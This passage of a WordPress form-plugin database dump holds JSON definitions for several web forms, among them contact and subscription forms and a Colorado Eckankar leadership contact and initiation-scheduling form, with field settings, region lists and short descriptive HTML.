Name\",\"required\":false},\"settings\":{\"container_class\":\"\",\"label\":\"Last Name\",\"help_message\":\"\",\"error_message\":\"\",\"visible\":true,\"validation_rules\":{\"required\":{\"value\":false,\"message\":\"This field is required\"}},\"conditional_logics\":[]},\"editor_options\":{\"template\":\"inputText\"}}},\"editor_options\":{\"title\":\"Name Fields\",\"element\":\"name-fields\",\"icon_class\":\"ff-edit-name\",\"template\":\"nameFields\"},\"uniqElKey\":\"el_1570866006692\"},{\"index\":1,\"element\":\"input_email\",\"attributes\":{\"type\":\"email\",\"name\":\"email\",\"value\":\"\",\"id\":\"\",\"class\":\"\",\"placeholder\":\"Email Address\"},\"settings\":{\"container_class\":\"\",\"label\":\"Email\",\"label_placement\":\"\",\"help_message\":\"\",\"admin_field_label\":\"\",\"validation_rules\":{\"required\":{\"value\":true,\"message\":\"This field is required\"},\"email\":{\"value\":true,\"message\":\"This field must contain a valid email\"}},\"conditional_logics\":[]},\"editor_options\":{\"title\":\"Email Address\",\"icon_class\":\"ff-edit-email\",\"template\":\"inputText\"},\"uniqElKey\":\"el_1570866012914\"},{\"index\":2,\"element\":\"input_text\",\"attributes\":{\"type\":\"text\",\"name\":\"subject\",\"value\":\"\",\"class\":\"\",\"placeholder\":\"Subject\"},\"settings\":{\"container_class\":\"\",\"label\":\"Subject\",\"label_placement\":\"\",\"admin_field_label\":\"Subject\",\"help_message\":\"\",\"validation_rules\":{\"required\":{\"value\":false,\"message\":\"This field is required\"}},\"conditional_logics\":{\"type\":\"any\",\"status\":false,\"conditions\":[{\"field\":\"\",\"value\":\"\",\"operator\":\"\"}]}},\"editor_options\":{\"title\":\"Simple Text\",\"icon_class\":\"ff-edit-text\",\"template\":\"inputText\"},\"uniqElKey\":\"el_1570878958648\"},{\"index\":3,\"element\":\"textarea\",\"attributes\":{\"name\":\"message\",\"value\":\"\",\"id\":\"\",\"class\":\"\",\"placeholder\":\"Your Message\",\"rows\":4,\"cols\":2},\"settings\":{\"container_class\":\"\",\"label\":\"Your Message\",\"admin_field_label\":\"\",\"label_placement\":\"\",\"help_message\":\"\",\"validation_rules\":{\"required\":{\"value\":true,\"message\":\"This field is required\"}},\"conditional_logics\":{\"type\":\"any\",\"status\":false,\"conditions\":[{\"field\":\"\",\"value\":\"\",\"operator\":\"\"}]}},\"editor_options\":{\"title\":\"Text Area\",\"icon_class\":\"ff-edit-textarea\",\"template\":\"inputTextarea\"},\"uniqElKey\":\"el_1570879001207\"}],\"submitButton\":{\"uniqElKey\":\"el_1524065200616\",\"element\":\"button\",\"attributes\":{\"type\":\"submit\",\"class\":\"\"},\"settings\":{\"align\":\"left\",\"button_style\":\"default\",\"container_class\":\"\",\"help_message\":\"\",\"background_color\":\"#409EFF\",\"button_size\":\"md\",\"color\":\"#ffffff\",\"button_ui\":{\"type\":\"default\",\"text\":\"Submit Form\",\"img_url\":\"\"}},\"editor_options\":{\"title\":\"Submit Button\"}}}',0,'',NULL,2,'2021-09-04 19:05:21','2021-09-04 19:05:21'),(2,'Subscription Form','published',NULL,'{\"fields\":[{\"index\":1,\"element\":\"container\",\"attributes\":[],\"settings\":{\"container_class\":\"\",\"conditional_logics\":{\"type\":\"any\",\"status\":false,\"conditions\":[{\"field\":\"\",\"value\":\"\",\"operator\":\"\"}]}},\"columns\":[{\"fields\":[{\"index\":1,\"element\":\"input_email\",\"attributes\":{\"type\":\"email\",\"name\":\"email\",\"value\":\"\",\"id\":\"\",\"class\":\"\",\"placeholder\":\"Your Email Address\"},\"settings\":{\"container_class\":\"\",\"label\":\"\",\"label_placement\":\"\",\"help_message\":\"\",\"admin_field_label\":\"Email\",\"validation_rules\":{\"required\":{\"value\":true,\"message\":\"This field is required\"},\"email\":{\"value\":true,\"message\":\"This field must contain a valid email\"}},\"conditional_logics\":[],\"is_unique\":\"no\",\"unique_validation_message\":\"Email address need to be unique.\"},\"editor_options\":{\"title\":\"Email Address\",\"icon_class\":\"ff-edit-email\",\"template\":\"inputText\"},\"uniqElKey\":\"el_16231279686950.8779857923682932\"}]},{\"fields\":[{\"index\":15,\"element\":\"custom_submit_button\",\"attributes\":{\"class\":\"\",\"type\":\"submit\"},\"settings\":{\"button_style\":\"\",\"button_size\":\"md\",\"align\":\"left\",\"container_class\":\"\",\"current_state\":\"normal_styles\",\"background_color\":\"\",\"color\":\"\",\"hover_styles\":{\"backgroundColor\":\"#ffffff\",\"borderColor\":\"#409EFF\",\"color\":\"#409EFF\",\"borderRadius\":\"\",\"minWidth\":\"100%\"},\"normal_styles\":{\"backgroundColor\":\"#409EFF\",\"borderColor\":\"#409EFF\",\"color\":\"#ffffff\",\"borderRadius\":\"\",\"minWidth\":\"100%\"},\"button_ui\":{\"text\":\"Subscribe\",\"type\":\"default\",\"img_url\":\"\"},\"conditional_logics\":{\"type\":\"any\",\"status\":false,\"conditions\":[{\"field\":\"\",\"value\":\"\",\"operator\":\"\"}]}},\"editor_options\":{\"title\":\"Custom Submit Button\",\"icon_class\":\"dashicons dashicons-arrow-right-alt\",\"template\":\"customButton\"},\"uniqElKey\":\"el_16231279798380.5947400167493171\"}]}],\"editor_options\":{\"title\":\"Two Column Container\",\"icon_class\":\"ff-edit-column-2\"},\"uniqElKey\":\"el_16231279284710.40955091024524304\"}],\"submitButton\":{\"uniqElKey\":\"el_1524065200616\",\"element\":\"button\",\"attributes\":{\"type\":\"submit\",\"class\":\"\"},\"settings\":{\"align\":\"left\",\"button_style\":\"default\",\"container_class\":\"\",\"help_message\":\"\",\"background_color\":\"#409EFF\",\"button_size\":\"md\",\"color\":\"#ffffff\",\"button_ui\":{\"type\":\"default\",\"text\":\"Subscribe\",\"img_url\":\"\"}},\"editor_options\":{\"title\":\"Submit Button\"}}}',0,'form',NULL,2,'2021-09-04 19:05:21','2021-09-04 19:05:21'),(5,'Colorado Statewide Leadership Contacts','published',NULL,'{\"fields\":[{\"index\":17,\"element\":\"custom_html\",\"attributes\":[],\"settings\":{\"html_codes\":\"<p><span style=\\\"color: #1d5791; font-family: raleway; font-size: 30px; font-weight: 600;\\\">Colorado Statewide Leadership Contacts</span></p>\\n<div style=\\\"font-family: open sans; padding: 15px; border-radius: 5px; border: 1px solid #eae8e8; background-color: #ffffff;\\\">\\n<p style=\\\"margin-bottom: 0px;\\\"><span style=\\\"color: #625f5f;\\\"><span style=\\\"font-size: 19px; font-weight: 600;\\\">If you would like to contact someone from Colorado ECK leadership, just fill out the form below.<br /></span></span><span style=\\\"color: #625f5f;\\\"><span style=\\\"font-size: 19px; font-weight: 600;\\\">Select the Colorado region of interest and the person you would like to contact.</span></span></p>\\n</div>\",\"conditional_logics\":{\"type\":\"any\",\"status\":false,\"conditions\":[{\"field\":\"\",\"value\":\"\",\"operator\":\"\"}]},\"container_class\":\"\"},\"editor_options\":{\"title\":\"Custom HTML\",\"icon_class\":\"ff-edit-html\",\"template\":\"customHTML\"},\"uniqElKey\":\"el_1692151769184\"},{\"index\":0,\"element\":\"input_name\",\"attributes\":{\"name\":\"names\",\"data-type\":\"name-element\"},\"settings\":{\"container_class\":\"\",\"admin_field_label\":\"Name\",\"conditional_logics\":{\"type\":\"any\",\"status\":false,\"conditions\":[{\"field\":\"\",\"value\":\"\",\"operator\":\"\"}]},\"label_placement\":\"top\"},\"fields\":{\"first_name\":{\"element\":\"input_text\",\"attributes\":{\"type\":\"text\",\"name\":\"first_name\",\"value\":\"\",\"id\":\"\",\"class\":\"\",\"placeholder\":\"First Name\",\"maxlength\":\"\"},\"settings\":{\"container_class\":\"\",\"label\":\"First Name\",\"help_message\":\"\",\"visible\":true,\"validation_rules\":{\"required\":{\"value\":true,\"message\":\"This field is required\"}},\"conditional_logics\":[]},\"editor_options\":{\"template\":\"inputText\"}},\"middle_name\":{\"element\":\"input_text\",\"attributes\":{\"type\":\"text\",\"name\":\"middle_name\",\"value\":\"\",\"id\":\"\",\"class\":\"\",\"placeholder\":\"Middle Name\",\"required\":false,\"maxlength\":\"\"},\"settings\":{\"container_class\":\"\",\"label\":\"Middle Name\",\"help_message\":\"\",\"error_message\":\"\",\"visible\":false,\"validation_rules\":{\"required\":{\"value\":false,\"message\":\"This field is required\"}},\"conditional_logics\":[]},\"editor_options\":{\"template\":\"inputText\"}},\"last_name\":{\"element\":\"input_text\",\"attributes\":{\"type\":\"text\",\"name\":\"last_name\",\"value\":\"\",\"id\":\"\",\"class\":\"\",\"placeholder\":\"Last Name\",\"required\":false,\"maxlength\":\"\"},\"settings\":{\"container_class\":\"\",\"label\":\"Last Name\",\"help_message\":\"\",\"error_message\":\"\",\"visible\":true,\"validation_rules\":{\"required\":{\"value\":true,\"message\":\"This field is required\"}},\"conditional_logics\":[]},\"editor_options\":{\"template\":\"inputText\"}}},\"editor_options\":{\"title\":\"Name Fields\",\"element\":\"name-fields\",\"icon_class\":\"ff-edit-name\",\"template\":\"nameFields\"},\"uniqElKey\":\"el_1690400856017\"},{\"index\":1,\"element\":\"container\",\"attributes\":[],\"settings\":{\"container_class\":\"\",\"conditional_logics\":[],\"container_width\":\"\"},\"columns\":[{\"width\":50,\"fields\":[{\"index\":1,\"element\":\"input_email\",\"attributes\":{\"type\":\"email\",\"name\":\"email\",\"value\":\"\",\"id\":\"\",\"class\":\"\",\"placeholder\":\"Email Address\"},\"settings\":{\"container_class\":\"\",\"label\":\"Email\",\"label_placement\":\"\",\"help_message\":\"\",\"admin_field_label\":\"\",\"prefix_label\":\"\",\"suffix_label\":\"\",\"validation_rules\":{\"required\":{\"value\":true,\"message\":\"This field is required\"},\"email\":{\"value\":true,\"message\":\"This field must contain a valid email\"}},\"conditional_logics\":{\"type\":\"any\",\"status\":false,\"conditions\":[{\"field\":\"\",\"value\":\"\",\"operator\":\"\"}]},\"is_unique\":\"no\",\"unique_validation_message\":\"Email address need to be unique.\"},\"editor_options\":{\"title\":\"Email\",\"icon_class\":\"ff-edit-email\",\"template\":\"inputText\"},\"uniqElKey\":\"el_1688578582153\"}]},{\"width\":50,\"fields\":[{\"index\":2,\"element\":\"input_text\",\"attributes\":{\"type\":\"text\",\"name\":\"input_text\",\"value\":\"\",\"class\":\"\",\"placeholder\":\"Phone Number\",\"maxlength\":\"\"},\"settings\":{\"container_class\":\"\",\"label\":\"Phone\",\"label_placement\":\"\",\"admin_field_label\":\"\",\"help_message\":\"Please format your phone number with appropriate dashes.\",\"prefix_label\":\"\",\"suffix_label\":\"\",\"validation_rules\":{\"required\":{\"value\":true,\"message\":\"This field is required\"}},\"conditional_logics\":{\"type\":\"any\",\"status\":false,\"conditions\":[{\"field\":\"\",\"value\":\"\",\"operator\":\"\"}]},\"is_unique\":\"no\",\"unique_validation_message\":\"This value need to be unique.\"},\"editor_options\":{\"title\":\"Simple Text\",\"icon_class\":\"ff-edit-text\",\"template\":\"inputText\"},\"uniqElKey\":\"el_1688579169528\"}]}],\"editor_options\":{\"title\":\"Two Column Container\",\"icon_class\":\"ff-edit-column-2\"},\"uniqElKey\":\"el_1688578520336\"},{\"index\":8,\"element\":\"input_radio\",\"attributes\":{\"type\":\"radio\",\"name\":\"input_radio\",\"value\":\"\"},\"settings\":{\"dynamic_default_value\":\"\",\"container_class\":\"\",\"label\":\"Choose Region of Interest\",\"admin_field_label\":\"Choose Region\",\"label_placement\":\"\",\"display_type\":\"\",\"help_message\":\"\",\"randomize_options\":\"no\",\"advanced_options\":[{\"label\":\"Colorado State\",\"value\":\"Colorado State\",\"calc_value\":\"\",\"image\":\"\",\"id\":0},{\"label\":\"Central Colorado\",\"value\":\"Central Colorado\",\"calc_value\":\"\",\"image\":\"\",\"id\":1},{\"label\":\"Colorado Springs\",\"value\":\"Colorado Springs\",\"calc_value\":\"\",\"image\":\"\",\"id\":2},{\"label\":\"Loveland\",\"value\":\"Loveland\",\"calc_value\":\"\",\"image\":\"\",\"id\":3},{\"label\":\"Mountain Area\",\"value\":\"Mountain Area\",\"calc_value\":\"\",\"image\":\"\",\"id\":4}],\"calc_value_status\":false,\"enable_image_input\":false,\"values_visible\":false,\"validation_rules\":{\"required\":{\"value\":true,\"message\":\"This field is required\"}},\"conditional_logics\":{\"type\":\"any\",\"status\":false,\"conditions\":[{\"field\":\"\",\"value\":\"\",\"operator\":\"\"}]},\"layout_class\":\"ff_list_inline\"},\"editor_options\":{\"title\":\"Radio Field\",\"icon_class\":\"ff-edit-radio\",\"element\":\"input-radio\",\"template\":\"inputCheckable\"},\"uniqElKey\":\"el_1691689756630\"},{\"index\":7,\"element\":\"select\",\"attributes\":{\"name\":\"dropdown\",\"value\":\"\",\"id\":\"\",\"class\":\"\"},\"settings\":{\"dynamic_default_value\":\"\",\"label\":\"Colorado State RESA Organization Leadership Positions\",\"admin_field_label\":\"Colorado State\",\"help_message\":\"\",\"container_class\":\"\",\"label_placement\":\"\",\"placeholder\":\"- Select -\",\"advanced_options\":[{\"label\":\"Colorado RESA Organization Leadership\",\"value\":\"Colorado RESA Organization Leadership\",\"id\":0},{\"label\":\"Central Colorado Organization Leadership\",\"value\":\"Central Colorado Organization Leadership\",\"id\":1},{\"label\":\"Colorado Springs Organization Leadership\",\"value\":\"Colorado Springs Organization Leadership\",\"id\":2},{\"label\":\"Loveland Organization Leadership\",\"value\":\"Loveland Organization Leadership\",\"id\":3},{\"label\":\"Mountain Areas Organization Leadership\",\"value\":\"Mountain Areas Organization Leadership\",\"id\":4}],\"calc_value_status\":false,\"enable_image_input\":false,\"values_visible\":false,\"enable_select_2\":\"no\",\"validation_rules\":{\"required\":{\"value\":false,\"message\":\"This field is required\"}},\"conditional_logics\":{\"type\":\"any\",\"status\":true,\"conditions\":[{\"field\":\"input_radio\",\"value\":\"Colorado State\",\"operator\":\"=\"}]},\"randomize_options\":\"no\"},\"editor_options\":{\"title\":\"Dropdown\",\"icon_class\":\"ff-edit-dropdown\",\"element\":\"select\",\"template\":\"select\"},\"uniqElKey\":\"el_1692072160879\"},{\"index\":7,\"element\":\"select\",\"attributes\":{\"name\":\"dropdown_11\",\"value\":\"\",\"id\":\"\",\"class\":\"\"},\"settings\":{\"dynamic_default_value\":\"\",\"label\":\"Central Colorado Organization Leadership Positions\",\"admin_field_label\":\"CentralColorado\",\"help_message\":\"\",\"container_class\":\"\",\"label_placement\":\"\",\"placeholder\":\"- Select -\",\"advanced_options\":[{\"label\":\"ECK Temple Director\",\"value\":\"eck-temple-director\\r\",\"id\":0},{\"label\":\"ECK Temple Vahana Leader\\r\",\"value\":\"ECK Temple Vahana Leader\\r\",\"id\":1},{\"label\":\"Spiritual Services Director\\r\",\"value\":\"Spiritual Services Director\\r\",\"id\":2},{\"label\":\"Administrative Services\\r\",\"value\":\"Administrative Services\\r\",\"id\":3}],\"calc_value_status\":false,\"enable_image_input\":false,\"values_visible\":true,\"enable_select_2\":\"no\",\"validation_rules\":{\"required\":{\"value\":false,\"message\":\"This field is required\"}},\"conditional_logics\":{\"type\":\"any\",\"status\":true,\"conditions\":[{\"field\":\"input_radio\",\"value\":\"Central Colorado\",\"operator\":\"=\"}]},\"randomize_options\":\"no\"},\"editor_options\":{\"title\":\"Dropdown\",\"icon_class\":\"ff-edit-dropdown\",\"element\":\"select\",\"template\":\"select\"},\"uniqElKey\":\"el_16902329942560.6099262939126653\"},{\"index\":7,\"element\":\"select\",\"attributes\":{\"name\":\"dropdown_19\",\"value\":\"\",\"id\":\"\",\"class\":\"\"},\"settings\":{\"dynamic_default_value\":\"\",\"label\":\"Colorado Springs Organization Leadership Positions\",\"admin_field_label\":\"Colorado Springs\",\"help_message\":\"\",\"container_class\":\"\",\"label_placement\":\"\",\"placeholder\":\"- Select -\",\"advanced_options\":[{\"label\":\"Local Director\",\"value\":\"Local Director\",\"id\":0},{\"label\":\"Administrative Services\",\"value\":\"Administrative Services\",\"id\":1},{\"label\":\"ECK Center Coordinator\",\"value\":\"ECK Center Coordinator\",\"id\":2},{\"label\":\"Spiritual Services Director\",\"value\":\"Spiritual Services Director\",\"id\":3},{\"label\":\"Vahana Leader\",\"value\":\"Vahana Leader\",\"id\":4}],\"calc_value_status\":false,\"enable_image_input\":false,\"values_visible\":false,\"enable_select_2\":\"no\",\"validation_rules\":{\"required\":{\"value\":false,\"message\":\"This field is required\"}},\"conditional_logics\":{\"type\":\"any\",\"status\":true,\"conditions\":[{\"field\":\"input_radio\",\"value\":\"Colorado Springs\",\"operator\":\"=\"}]},\"randomize_options\":\"no\"},\"editor_options\":{\"title\":\"Dropdown\",\"icon_class\":\"ff-edit-dropdown\",\"element\":\"select\",\"template\":\"select\"},\"uniqElKey\":\"el_16902338477780.5815995774149973\"},{\"index\":7,\"element\":\"select\",\"attributes\":{\"name\":\"dropdown_21\",\"value\":\"\",\"id\":\"\",\"class\":\"\"},\"settings\":{\"dynamic_default_value\":\"\",\"label\":\"Loveland Organization Leadership Positions\",\"admin_field_label\":\"Loveland\",\"help_message\":\"\",\"container_class\":\"\",\"label_placement\":\"\",\"placeholder\":\"- Select -\",\"advanced_options\":[{\"label\":\"Local Administrator\",\"value\":\"Local Administrator\",\"id\":0}],\"calc_value_status\":false,\"enable_image_input\":false,\"values_visible\":false,\"enable_select_2\":\"no\",\"validation_rules\":{\"required\":{\"value\":false,\"message\":\"This field is required\"}},\"conditional_logics\":{\"type\":\"any\",\"status\":true,\"conditions\":[{\"field\":\"input_radio\",\"value\":\"Loveland\",\"operator\":\"=\"}]},\"randomize_options\":\"no\"},\"editor_options\":{\"title\":\"Dropdown\",\"icon_class\":\"ff-edit-dropdown\",\"element\":\"select\",\"template\":\"select\"},\"uniqElKey\":\"el_1690428749142\"},{\"index\":7,\"element\":\"select\",\"attributes\":{\"name\":\"dropdown_12\",\"value\":\"\",\"id\":\"\",\"class\":\"\"},\"settings\":{\"dynamic_default_value\":\"\",\"label\":\"Mountain Area Organization Leadership Positions\",\"admin_field_label\":\"Mountain Area\",\"help_message\":\"\",\"container_class\":\"\",\"label_placement\":\"\",\"placeholder\":\"- Select -\",\"advanced_options\":[{\"label\":\"Local Director\",\"value\":\"Local Director\",\"id\":0}],\"calc_value_status\":false,\"enable_image_input\":false,\"values_visible\":false,\"enable_select_2\":\"no\",\"validation_rules\":{\"required\":{\"value\":false,\"message\":\"This field is required\"}},\"conditional_logics\":{\"type\":\"any\",\"status\":true,\"conditions\":[{\"field\":\"input_radio\",\"value\":\"Mountain Area\",\"operator\":\"=\"}]},\"randomize_options\":\"no\"},\"editor_options\":{\"title\":\"Dropdown\",\"icon_class\":\"ff-edit-dropdown\",\"element\":\"select\",\"template\":\"select\"},\"uniqElKey\":\"el_16902330764980.869409204942602\"},{\"index\":3,\"element\":\"textarea\",\"attributes\":{\"name\":\"description\",\"value\":\"\",\"id\":\"\",\"class\":\"\",\"placeholder\":\"\",\"rows\":3,\"cols\":2,\"maxlength\":\"\"},\"settings\":{\"container_class\":\"\",\"label\":\"Enter Your Message Here \",\"admin_field_label\":\"User Message\",\"label_placement\":\"\",\"help_message\":\"\",\"validation_rules\":{\"required\":{\"value\":true,\"message\":\"This field is required\"}},\"conditional_logics\":{\"type\":\"any\",\"status\":false,\"conditions\":[{\"field\":\"\",\"value\":\"\",\"operator\":\"\"}]}},\"editor_options\":{\"title\":\"Text Area\",\"icon_class\":\"ff-edit-textarea\",\"template\":\"inputTextarea\"},\"uniqElKey\":\"el_1690145009415\"},{\"index\":17,\"element\":\"custom_html\",\"attributes\":[],\"settings\":{\"html_codes\":\"<p>This site is protected by reCAPTCHA and the Google <a href=\\\"https://policies.google.com/privacy\\\">Privacy Policy</a> and <a href=\\\"https://policies.google.com/terms\\\">Terms of Service</a> apply.</p>\\n\",\"conditional_logics\":{\"type\":\"any\",\"status\":false,\"conditions\":[{\"field\":\"\",\"value\":\"\",\"operator\":\"\"}]},\"container_class\":\"\"},\"editor_options\":{\"title\":\"Custom HTML\",\"icon_class\":\"ff-edit-html\",\"template\":\"customHTML\"},\"uniqElKey\":\"el_1690145191197\"}],\"submitButton\":{\"uniqElKey\":\"el_1524065200616\",\"element\":\"button\",\"attributes\":{\"type\":\"submit\",\"class\":\"\"},\"settings\":{\"align\":\"left\",\"button_style\":\"default\",\"container_class\":\"\",\"help_message\":\"\",\"background_color\":\"#1a7efb\",\"button_size\":\"md\",\"color\":\"#ffffff\",\"button_ui\":{\"type\":\"default\",\"text\":\"Submit Form\",\"img_url\":\"\"},\"normal_styles\":{\"backgroundColor\":\"#1a7efb\",\"borderColor\":\"#1a7efb\",\"color\":\"#ffffff\",\"borderRadius\":\"\",\"minWidth\":\"\"},\"hover_styles\":{\"backgroundColor\":\"#ffffff\",\"borderColor\":\"#1a7efb\",\"color\":\"#1a7efb\",\"borderRadius\":\"\",\"minWidth\":\"\"},\"current_state\":\"normal_styles\"},\"editor_options\":{\"title\":\"Submit Button\"}}}',0,'form',NULL,15,'2023-08-02 02:53:03','2023-08-18 03:49:53'),(4,'ECK Initiator and ESA Form','published',NULL,'{\"fields\":[{\"index\":17,\"element\":\"custom_html\",\"attributes\":[],\"settings\":{\"html_codes\":\"<p><span style=\\\"color: #1d5791; font-family: raleway; font-size: 30px; line-height: 52px; font-weight: 600;\\\">ECK Initiator and ESA Scheduling</span></p>\\n<div style=\\\"font-family: open sans; padding: 15px; border-radius: 5px; border: 1px solid #eae8e8; background-color: #ffffff;\\\">\\n<p style=\\\"margin-bottom: 20px;\\\"><span style=\\\"color: #625f5f;\\\"><span style=\\\"font-size: 19px; font-weight: 600;\\\">If you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just fill out the form below. </span><span style=\\\"font-size: 19px; font-weight: 600;\\\">Select the Colorado region of interest and the person you would like to contact.</span></span></p>\\n<p><strong><span style=\\\"color: #1d5791; font-size: 19px;\\\">ECK Initiation</span></strong></p>\\n<p style=\\\"margin-top: -10px; margin-bottom: 18px; font-size: 17px;\\\">An ECK initiation is a spiritual rite. An earned invitation to move into a greater state of conscious awareness. It increases the power and love of Spirit in your life. With each initiation, Soul shines brighter with more of the Light and Sound of God, the Holy Spirit.</p>\\n<p><strong><span style=\\\"color: #1d5791; font-size: 19px;\\\"> ECK Spiritual Aide</span></strong></p>\\n<p style=\\\"margin-top: -10px; font-size: 17px;\\\">The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained to offer this assistance. ECK Spiritual Aide sessions, though not counseling, can help you find your own answers in challenging situations through the personal guidance of Divine Spirit. There are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.</p>\\n</div>\",\"conditional_logics\":{\"type\":\"any\",\"status\":false,\"conditions\":[{\"field\":\"\",\"value\":\"\",\"operator\":\"\"}]},\"container_class\":\"\"},\"editor_options\":{\"title\":\"Custom HTML\",\"icon_class\":\"ff-edit-html\",\"template\":\"customHTML\"},\"uniqElKey\":\"el_1690400849364\"},{\"index\":0,\"element\":\"input_name\",\"attributes\":{\"name\":\"names\",\"data-type\":\"name-element\"},\"settings\":{\"container_class\":\"\",\"admin_field_label\":\"Name\",\"conditional_logics\":{\"type\":\"any\",\"status\":false,\"conditions\":[{\"field\":\"\",\"value\":\"\",\"operator\":\"\"}]},\"label_placement\":\"top\"},\"fields\":{\"first_name\":{\"element\":\"input_text\",\"attributes\":{\"type\":\"text\",\"name\":\"first_name\",\"value\":\"\",\"id\":\"\",\"class\":\"\",\"placeholder\":\"First Name\",\"maxlength\":\"\"},\"settings\":{\"container_class\":\"\",\"label\":\"First Name\",\"help_message\":\"\",\"visible\":true,\"validation_rules\":{\"required\":{\"value\":true,\"message\":\"This field is required\"}},\"conditional_logics\":[]},\"editor_options\":{\"template\":\"inputText\"}},\"middle_name\":{\"element\":\"input_text\",\"attributes\":{\"type\":\"text\",\"name\":\"middle_name\",\"value\":\"\",\"id\":\"\",\"class\":\"\",\"placeholder\":\"Middle Name\",\"required\":false,\"maxlength\":\"\"},\"settings\":{\"container_class\":\"\",\"label\":\"Middle Name\",\"help_message\":\"\",\"error_message\":\"\",\"visible\":false,\"validation_rules\":{\"required\":{\"value\":false,\"message\":\"This field is required\"}},\"conditional_logics\":[]},\"editor_options\":{\"template\":\"inputText\"}},\"last_name\":{\"element\":\"input_text\",\"attributes\":{\"type\":\"text\",\"name\":\"last_name\",\"value\":\"\",\"id\":\"\",\"class\":\"\",\"placeholder\":\"Last Name\",\"required\":false,\"maxlength\":\"\"},\"settings\":{\"container_class\":\"\",\"label\":\"Last Name\",\"help_message\":\"\",\"error_message\":\"\",\"visible\":true,\"validation_rules\":{\"required\":{\"value\":true,\"message\":\"This field is required\"}},\"conditional_logics\":[]},\"editor_options\":{\"template\":\"inputText\"}}},\"editor_options\":{\"title\":\"Name Fields\",\"element\":\"name-fields\",\"icon_class\":\"ff-edit-name\",\"template\":\"nameFields\"},\"uniqElKey\":\"el_1690400856017\"},{\"index\":1,\"element\":\"container\",\"attributes\":[],\"settings\":{\"container_class\":\"\",\"conditional_logics\":[],\"container_width\":\"\"},\"columns\":[{\"width\":50,\"fields\":[{\"index\":1,\"element\":\"input_email\",\"attributes\":{\"type\":\"email\",\"name\":\"email\",\"value\":\"\",\"id\":\"\",\"class\":\"\",\"placeholder\":\"Email Address\"},\"settings\":{\"container_class\":\"\",\"label\":\"Email\",\"label_placement\":\"\",\"help_message\":\"\",\"admin_field_label\":\"\",\"prefix_label\":\"\",\"suffix_label\":\"\",\"validation_rules\":{\"required\":{\"value\":true,\"message\":\"This field is required\"},\"email\":{\"value\":true,\"message\":\"This field must contain a valid email\"}},\"conditional_logics\":{\"type\":\"any\",\"status\":false,\"conditions\":[{\"field\":\"\",\"value\":\"\",\"operator\":\"\"}]},\"is_unique\":\"no\",\"unique_validation_message\":\"Email address need to be unique.\"},\"editor_options\":{\"title\":\"Email\",\"icon_class\":\"ff-edit-email\",\"template\":\"inputText\"},\"uniqElKey\":\"el_1688578582153\"}]},{\"width\":50,\"fields\":[{\"index\":2,\"element\":\"input_text\",\"attributes\":{\"type\":\"text\",\"name\":\"input_text\",\"value\":\"\",\"class\":\"\",\"placeholder\":\"Phone Number\",\"maxlength\":\"\"},\"settings\":{\"container_class\":\"\",\"label\":\"Phone\",\"label_placement\":\"\",\"admin_field_label\":\"\",\"help_message\":\"Please format your phone number with appropriate dashes.\",\"prefix_label\":\"\",\"suffix_label\":\"\",\"validation_rules\":{\"required\":{\"value\":true,\"message\":\"This field is required\"}},\"conditional_logics\":{\"type\":\"any\",\"status\":false,\"conditions\":[{\"field\":\"\",\"value\":\"\",\"operator\":\"\"}]},\"is_unique\":\"no\",\"unique_validation_message\":\"This value need to be unique.\"},\"editor_options\":{\"title\":\"Simple Text\",\"icon_class\":\"ff-edit-text\",\"template\":\"inputText\"},\"uniqElKey\":\"el_1688579169528\"}]}],\"editor_options\":{\"title\":\"Two Column Container\",\"icon_class\":\"ff-edit-column-2\"},\"uniqElKey\":\"el_1688578520336\"},{\"index\":8,\"element\":\"input_radio\",\"attributes\":{\"type\":\"radio\",\"name\":\"input_radio\",\"value\":\"\"},\"settings\":{\"dynamic_default_value\":\"\",\"container_class\":\"\",\"label\":\"Choose Region of Interest\",\"admin_field_label\":\"Choose Region\",\"label_placement\":\"\",\"display_type\":\"\",\"help_message\":\"\",\"randomize_options\":\"no\",\"advanced_options\":[{\"label\":\"Akron\",\"value\":\"Akron\",\"calc_value\":\"\",\"image\":\"\",\"id\":0},{\"label\":\"Alamosa\",\"value\":\"Alamosa\",\"id\":1},{\"label\":\"Berthoud\",\"value\":\"Berthoud\",\"calc_value\":\"\",\"image\":\"\",\"id\":2},{\"label\":\"Boulder\",\"value\":\"Boulder\",\"id\":3},{\"label\":\"Broomfield\",\"value\":\"Broomfield\",\"calc_value\":\"\",\"image\":\"\",\"id\":4},{\"label\":\"Centennial\",\"value\":\"Centennial\",\"calc_value\":\"\",\"image\":\"\",\"id\":5},{\"label\":\"Colorado Springs\",\"value\":\"Colorado Springs\",\"id\":6},{\"label\":\"Cortez\",\"value\":\"Cortez\",\"calc_value\":\"\",\"image\":\"\",\"id\":7},{\"label\":\"Denver\",\"value\":\"Denver\",\"id\":8},{\"label\":\"Durango\",\"value\":\"Durango\",\"calc_value\":\"\",\"image\":\"\",\"id\":9},{\"label\":\"Englewood\",\"value\":\"Englewood\",\"calc_value\":\"\",\"image\":\"\",\"id\":10},{\"label\":\"Franktown\",\"value\":\"Franktown\",\"calc_value\":\"\",\"image\":\"\",\"id\":11},{\"label\":\"Johnstown\",\"value\":\"Johnstown\",\"id\":12},{\"label\":\"Longmont\",\"value\":\"Longmont\",\"id\":14},{\"label\":\"Louisville\",\"value\":\"Louisville\",\"calc_value\":\"\",\"image\":\"\",\"id\":15},{\"label\":\"Loveland\",\"value\":\"Loveland\",\"id\":16},{\"label\":\"Niwot\",\"value\":\"Niwot\",\"calc_value\":\"\",\"image\":\"\",\"id\":17},{\"label\":\"Pagosa Springs\",\"value\":\"Pagosa Springs\",\"id\":18},{\"label\":\"Parker\",\"value\":\"Parker\",\"id\":19},{\"label\":\"Pueblo\",\"value\":\"Pueblo\",\"id\":20}],\"calc_value_status\":false,\"enable_image_input\":false,\"values_visible\":false,\"validation_rules\":{\"required\":{\"value\":true,\"message\":\"This field is required\"}},\"conditional_logics\":{\"type\":\"any\",\"status\":false,\"conditions\":[{\"field\":\"\",\"value\":\"\",\"operator\":\"\"}]},\"layout_class\":\"ff_list_4col\"},\"editor_options\":{\"title\":\"Radio Field\",\"icon_class\":\"ff-edit-radio\",\"element\":\"input-radio\",\"template\":\"inputCheckable\"},\"uniqElKey\":\"el_1688614498060\"},{\"index\":7,\"element\":\"select\",\"attributes\":{\"name\":\"dropdown_1\",\"value\":\"\",\"id\":\"\",\"class\":\"\"},\"settings\":{\"dynamic_default_value\":\"\",\"label\":\"Akron 